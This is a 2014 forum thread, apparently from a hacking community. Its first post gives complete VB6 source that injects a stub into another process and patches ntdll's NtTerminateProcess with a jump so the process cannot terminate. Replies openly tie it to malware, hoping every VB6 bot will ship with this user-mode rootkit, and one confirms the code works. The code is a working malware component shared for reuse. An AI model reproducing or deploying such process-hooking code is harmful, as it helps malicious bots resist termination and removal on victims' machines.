NtTerminateProcess Hook



#1 noh4t


Posted 16 March 2014 - 04:12 AM

 

     Option Explicit
    ' Win32 imports used to locate ntdll!NtTerminateProcess inside another
    ' process and overwrite its first five bytes with a relative JMP to a
    ' small stub. Everything here is 32-bit only: addresses and HMODULEs are
    ' Longs and the JMP carries a 32-bit displacement, so a 64-bit target
    ' cannot be patched from this (32-bit VB6) process.
    Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Long)
    ' lpBaseAddress/lpBuffer are "As Any": callers pass "ByVal addr" for the
    ' remote address and a Byte array element for the local buffer.
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    ' lpcbNeeded is declared ByVal here, so callers must pass VarPtr(var).
    Private Declare Function EnumProcessModules Lib "psapi" (ByVal hProcess As Long, ByRef lphModule As Long, ByVal cb As Long, ByVal lpcbNeeded As Long) As Long
    Private Declare Function GetModuleFileNameEx Lib "psapi" Alias "GetModuleFileNameExA" (ByVal hProcess As Long, ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
    Private Const MEM_RELEASE = &H8000
    Private Const MEM_COMMIT = &H1000
    Private Const MEM_RESERVE = &H2000
    Private Const PAGE_EXECUTE_READWRITE = &H40
    ' NOTE(review): full access is more than this module uses; the calls below
    ' need only PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE |
    ' PROCESS_VM_OPERATION -- confirm before narrowing.
    Private Const PROCESS_ALL_ACCESS = &H1F0FFF
    ' Module-level state shared by Hook/Unhook. Only ONE hook is tracked at a
    ' time; hooking a second process overwrites these without unhooking the first.
    Private hProcess As Long    ' handle to the patched process (0 = no hook)
    Private FuncAddr As Long    ' address of NtTerminateProcess in the target
    Private OldCode(4) As Byte  ' original 5 bytes at FuncAddr, restored by Unhook
    Private NewCode(4) As Byte  ' E9 + rel32 written over FuncAddr
    Private HookCode(4) As Byte ' stub body: xor eax,eax / ret 8
    Private CodeAddr As Long    ' address of the stub allocated in the target
    Private Function GetModuleHandleEx(ByVal hProcess As Long, ByVal ModuleName As String) As Long
    Dim hMods(1024) As Long
    Dim cbNeeded As Long
    Dim szModName As String
    Dim i As Integer
    If EnumProcessModules(hProcess, hMods(0), 1025 * 4, VarPtr(cbNeeded)) Then
    For i = 0 To (cbNeeded / 4)
    If hMods(i) Then
    szModName = String(260, 0)
    If GetModuleFileNameEx(hProcess, hMods(i), szModName, Len(szModName)) Then
    szModName = Left(szModName, InStr(1, szModName, Chr(0)) - 1)
    If LCase(szModName) = LCase(ModuleName) Then '
    GetModuleHandleEx = hMods(i)
    Erase hMods
    Exit Function
    End If
    End If
    End If
    Next i
    End If
    Erase hMods
    End Function
    Public Function HookNtTerminateProcess(ByVal ProcessId As Long) As Boolean
    Dim hMod As Long
    NewCode(0) = &HE9 ' jmp
    ' xor eax,eax
    ' ret 8
    HookCode(0) = &H33
    HookCode(1) = &HC0
    HookCode(2) = &HC2
    HookCode(3) = &H8
    HookCode(4) = &H0
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, ProcessId)
    If hProcess Then
    hMod = GetModuleHandleEx(hProcess, "c:\windows\system32\ntdll.dll")
    If hMod Then
    FuncAddr = GetProcAddress(hMod, "NtTerminateProcess")
    If FuncAddr Then
    ReadProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0
    CodeAddr = VirtualAllocEx(hProcess, ByVal 0, 5, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    If CodeAddr Then
    CopyMemory VarPtr(NewCode(1)), VarPtr(CodeAddr - FuncAddr - 5), 4
    WriteProcessMemory hProcess, ByVal CodeAddr, HookCode(0), 5, 0
    WriteProcessMemory hProcess, ByVal FuncAddr, NewCode(0), 5, 0
    HookNtTerminateProcess = True
    End If
    End If
    End If
    End If
    End Function
    Public Sub UnhookNtTerminateProcess()
    WriteProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0
    VirtualFreeEx hProcess, ByVal CodeAddr, 5, MEM_RELEASE
    CloseHandle hProcess
    End Sub

 





#2 d3k


Posted 16 March 2014 - 09:26 PM

Hopefully SF will now have a new standard: every VB6 bot will ship with a ring-3 (user-mode) rootkit.



#3 __Digital__


Posted 20 June 2014 - 09:19 PM

Nice code, and it works very well — thanks for sharing.



#4 iCode


Posted 24 June 2014 - 09:18 AM

How come you're using GetModuleHandleEx instead of GetModuleHandle or LoadLibrary? Also, using the full file path is not necessary with those APIs.




#5 OXYMORON


Posted 24 June 2014 - 10:57 AM

How come you're using GetModuleHandleEx instead of GetModuleHandle or LoadLibrary? Also, using the full file path is not necessary with those APIs.

 

I don't think he coded this himself, so he may not know, but @noh4t, do you know who did write this nice piece of code?



#6 Neelix


Posted 24 June 2014 - 05:45 PM


 

Credits to Subhash Dasyam.

 

Guess! He was also known as "7" (some people might remember him).



#7 OXYMORON


Posted 24 June 2014 - 07:04 PM


 

Credits to Subhash Dasyam.

 

Guess! He was also known as "7" (some people might remember him).

 

Thanks, Neelix, for that clarification! Yeah, I used to know this guy; he shared a lot in there back then. Mr 7 :)

